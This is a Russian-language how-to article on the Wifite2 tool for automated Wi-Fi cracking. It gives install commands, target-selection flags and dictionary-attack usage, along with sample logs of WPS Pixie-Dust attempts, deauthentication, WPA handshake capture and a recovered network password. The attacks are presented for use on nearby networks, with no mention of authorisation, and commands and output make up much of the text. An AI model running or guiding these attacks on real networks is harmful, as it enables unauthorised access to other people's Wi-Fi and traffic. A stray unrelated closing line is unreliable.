В этой статье будет рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi.
В этой статье рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi сети. Узнайте, как выбрать наилучшую стратегию взлома каждой сети.
Wifite был одним из первых инструментов для автоматизированного взлома Wi-Fi. В сравнении с Besside-ng, Wifite предлагает больше сценариев атак, что делает его более гибким, но иногда и медлительным.
Wifite2 - это обновленная версия, которая работает быстрее и эффективнее. Она стала мощнее и предлагает более изощренные тактики взлома.
Wifite2 реализует эффективный алгоритм для быстрого взлома близлежащих сетей. Программа сначала сканирует все каналы и сортирует сети по силе сигнала.
После сортировки Wifite2 отображает информацию о подключенных клиентах, наличии WPS и типе шифрования. На основе этой информации можно выбрать цели для атаки.
Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга. Wifite2 установлен в Kali Linux по умолчанию. Если вы не знакомы с Kali Linux, рекомендуем ознакомиться с вводным руководством по Kali Linux.
Если Wifite2 не установлен в вашей системе, выполните следующие команды в терминале:
git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install
Теперь Wifite2 установлен в вашей системе. Введите команду wifite -h
для получения информации о текущей версии.
Подключите беспроводной сетевой адаптер, совместимый с Kali Linux. Wifite2 автоматически выбирает адаптер и переключает карту в режим мониторинга. Совет: Убедитесь, что ваш адаптер поддерживает режим мониторинга, иначе атаки могут не сработать.
Если вы знаете канал атаки, используйте параметр -c
для его указания. Например:
wifite -c 11
После сканирования получите список доступных целей.
Изучите список целей и выберите наиболее подходящие для атаки. Можно также использовать флаг -wps
для поиска сетей с уязвимым WPS.
wifite -wps
После выбора целей Wifite2 начнет автоматические атаки. Если первый сценарий не сработает, программа попробует другой метод.
[+] (1/1) starting attacks against 69:96:43:69:D6:96 (The Daily Planet)
[+] The Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
[+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8:E0:EB:45:CD:45
[+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients:1, deauth:11s, timeout:7m59s)
[+] successfully captured handshake
[+] saving copy of handshake to hs/handshake_TheDailyPlanet_69:96:43:69:D6:96_2018-12-24T00-33-18.cap saved
[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96
[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist
[!] Failed to crack handshake: common.txt did not contain password
[+] Finished attacking 1 target(s), exiting
Результаты атаки можно сохранить для дальнейшего анализа. Если атака увязла, можно использовать сочетание клавиш Ctrl-C для остановки.
[+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Trying PIN 12523146 (DeAuth:Timeout) (Timeouts:15)
[!] interrupted
[+] 1 attack(s) remain, do you want to continue?
[+] type c to continue or s to stop:
Если мы смогли получить 4-этапное рукопожатие, то можно перебрать пароли с помощью флага --dict
и пути к словарю.
wifite -wpa --dict ./passwords.txt
Пример успешной дешифровки:
[+] Cracked WPA Handshake PSK: christmasham
[+] Access Point Name: Bourgeois Pig Guest
[+] Access Point BSSID: DE:F2:86:EC:CA:A0
[+] Encryption: WPA
[+] Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
[+] PSK (password): christmasham
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting
Ладно, не доказали. Но мы работаем над этим